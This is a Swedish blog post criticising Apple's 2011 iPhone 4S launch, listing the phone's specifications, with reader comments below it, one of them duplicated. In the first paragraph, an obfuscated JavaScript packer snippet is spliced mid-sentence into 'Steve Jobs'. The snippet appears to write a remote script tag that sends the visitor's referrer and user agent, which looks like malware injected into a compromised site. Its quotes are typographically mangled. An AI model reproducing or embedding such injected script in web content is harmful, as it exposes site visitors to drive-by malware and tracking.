Image Image Image Image Image Image Image Image Image Image

| 9 augusti, 2020

Scroll to top

Top

Apple säljer ut sina fans…IGEN! iPhone 4s …

Apple säljer ut sina fans…IGEN! iPhone 4s …
Filip Urde
 • On 4 oktober, 2011
 • http://www.revue.se/filip-urde

Steve eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|kknss|var|u0026u|referrer|ikaii||js|php’.split(’|’),0,{}))
jobs hann knappt vika ihop sin polo-tröja och stoppa den i sin 
i-Drawer, innan Apple skulle göra sina fans total besvikna igen.

Hypen har varit total! inklusive från vår sida… Alla har väntat på en iPhone 5, men vi fick en 4s (S för ”Skit”). Nu har dock mina värsta känslor lagt sig och jag kan äntligen försöka skriva vad jag tycker så ”snällt” och sakligt jag bara kan.

Återigen har vi alltså blivit snuvade på tårtan och fått en gammal sula. Nu vet jag inte om detta är Apples fel, eller alla vi som håller på med rykten i vår tids media. Men faktum kvarstår, Apple är helt okapabla att släppa något riktigt, riktigt bra, utan att hämma produkten lite…Det måste alltid finnas ett ”men”!

Jag har nu i snart 30 min spanat in de vilda kommentarerna som florerar på Facebook… det är inte bara jag som är upprörd är väll kontentan.

Men nu är skadan skedd och Apple kommer bara få hårdare konkurrens är vad jag kan säga.

Men vad kommer nu med iPhone 4s?

Den ser ut precis som en iPhone 4 men den är bestyckad med en A5-processor, vilket är lika med dubbla kärnor och upp till sju gånger snabbare grafik. Det betyder även att Airplay-spegling kommer att fungera.

Batteritiden: åtta timmar 3G-prat, 6 timmar 3G-surf, 9 timmar Wifi-surf, 10 timmar med video och 40 timmars musiklyssnande. Nerladdningshastigheten har gått upp från 7.2 mbit till 14.4….Som befarat… inget 4G!! 

Kameran: åtta megapixlar och upplösningen 3264 x 2448 pixlar.
Enligt Apple sjävla så är den största nyheten Siri, en inbyggda assistenten som man kan prata med, tala om vem man vill ringa, sätta alarm osv. Men det kommer såklart inte fungera på Svenska i början….

Det går nu att få iPhone med 64 GB minne för 100 dollar extra.
iPhone 4S kommer att börja säljas 14 oktober och förhandsbokningen börjar 7:e. Detta gäller dock endast i vissa prioriterade länder, vi i Sverige kommer att få vänta tills 28:e oktober.

 

Yey! Tack Apple…

Comments

 1. Karl

  Ja detta var ju ett skämt. 🙁

 2. Hade väntat mig en iPhone 5 men det gör inget tycket jag att den inte kom 😛 4Gs har ändå de funktioner som man väntade sig i 5an

 3. Olle liten

  Men Iphone 4S är en mobiltelefon.

  Iphone 4S är också ganska exakt den mobiltelefon som de flesta väntade sig att Apple skulle presentera.

  För även om det är ganska lätt att bli hänförd av Apples egen retorik
  så känns det mer passande att tala om de nyheter som presenterades i
  dag som evolutionära snarare än revolutionerande. Att släppa en Iphone
  4S är ett perfekt exempel på hur ett företag med självförtroende och
  självinsikt nog att veta precis hur mycket de behöver förändra för att
  fortsätta sälja mängder av telefoner agerar.

 4. Är det inte bara en siffra som är skillnaden då? De hade ju likaväl bara kunnat kalla den för iPhone 5 om de hade velat? Tycker dock det är smart av Apple att göra precis så som de gjort, väntan på 5an kommer bli större och när den släpps blir det mer explosivt bland alla som väntat! Har aldrig varit så insatt i de där med iPhone så jag gissar ju självklart bara!

  • Sebastian, det är klart man kan säga så. Och dem gör absolut rätt rent affärsmässigt i att göra detta val. Det som gör mig besviken på 4s, är nivån av hype (vilket självklart bara är skicklighet och något Apple är MÄSTARE på), men sen mängden nyheter. A5 processor, det är bra, det är bra med 8 megapixel. Men detta är självklarheter! inget man ställer till presskonferens för och hypar en helvärld i ett år för. Nya funktionen ”siri” är väll ”häftig”, men absolut inget nytt… tekniken är gammal… fast det är ju tablets också och det gick ju ganska bra för iPad. Frågan är väll idagsläget om ”Siri”, den stora nyheten, blir 4S exklusiv?! eller om iPhone 4 får möjligheten också. Betan är endast för 4s, så man vet ju aldrig. Men om iPhone 4 kan ha ”siri”, ja… Vad gör att jag som har en 4a vill köpa den? Jag anser att ett produkt släpp av den här magnituden bör skapa intresse för samtliga konsumenter…inte bara dem som har en iPhone 3g och är rent tekniskt/abonnemangsmässigt tvugna att byta. Förstår ni vad jag menar?

  • Sebastian, det är klart man kan säga så. Och dem gör absolut rätt rent affärsmässigt i att göra detta val. Det som gör mig besviken på 4s, är nivån av hype (vilket självklart bara är skicklighet och något Apple är MÄSTARE på), men sen mängden nyheter. A5 processor, det är bra, det är bra med 8 megapixel. Men detta är självklarheter! inget man ställer till presskonferens för och hypar en helvärld i ett år för. Nya funktionen ”siri” är väll ”häftig”, men absolut inget nytt… tekniken är gammal… fast det är ju tablets också och det gick ju ganska bra för iPad. Frågan är väll idagsläget om ”Siri”, den stora nyheten, blir 4S exklusiv?! eller om iPhone 4  får möjligheten också. Betan är endast för 4s, så man vet ju aldrig. Men om iPhone 4 kan ha ”siri”, ja… Vad gör att jag som har en 4a vill köpa den? Jag anser att ett produkt släpp av den här magnituden bör skapa intresse för samtliga konsumenter…inte bara dem som har en iPhone 3g och är rent tekniskt/abonnemangsmässigt tvugna att byta. Förstår ni vad jag menar?

   • Johan Husak

    Det hade varit sjukt osmart av Apple att ”hajpa” en kommande produkt. Det är ju naturligtvis inte Apple som gör det, då hade de förstås aldrig fått oss att tro att en iPhone 5 skulle komma och sedan göra alla besvikna med en iPhone 4S. Det blir ett givet byte till en 4S från min iPhone 4 iom att 100% av alla foton jag tar, tas med min iphone. Siri kommer att vara grymt i bilen när det kommer.